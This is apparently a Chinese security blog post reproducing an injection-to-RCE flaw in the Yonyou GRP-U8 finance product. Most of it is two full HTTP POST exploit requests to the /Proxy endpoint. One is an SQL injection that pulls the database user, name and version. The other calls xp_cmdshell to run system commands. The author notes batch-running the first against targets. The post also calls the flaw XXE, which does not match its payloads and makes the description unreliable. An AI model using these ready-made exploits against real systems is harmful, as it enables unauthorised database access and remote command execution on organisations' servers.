用友GRP-u8 注入-RCE漏洞復現

一、漏洞簡介

用友GRP-u8存在XXE漏洞，該漏洞源于應用程序解析XML輸入時沒有進制外部實體的加載，導致可加載惡意外部文件。

二、漏洞復現

SQL注入POC

POST /Proxy HTTP/1.1

Host: localhost:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 371

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

驗證過程

批量跑了一部分（這個是HW期間第一時間跑的）現在估計沒啥了

Rce注入EXP

POST /Proxy HTTP/1.1

Host: localhost:8080

Upgrade-Insecure-Requests: 1

User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9

Accept-Encoding: gzip, deflate

Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: 355

cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

參考：

https://www.cnblogs.com/0day-li/p/13652897.html

https://www.uedbox.com/post/14953/

https://www.cnblogs.com/Yang34/p/13653960.html

注意：??

免責聲明：本站提供安全工具、程序(方法)可能帶有攻擊性，僅供安全研究與教學之用，風險自負!

如果本文內容侵權或者對貴公司業務或者其他有影響，請聯系作者刪除。

轉載聲明：著作權歸作者所有。商業轉載請聯系作者獲得授權，非商業轉載請注明出處。

訂閱查看更多復現文章、學習筆記

thelostworld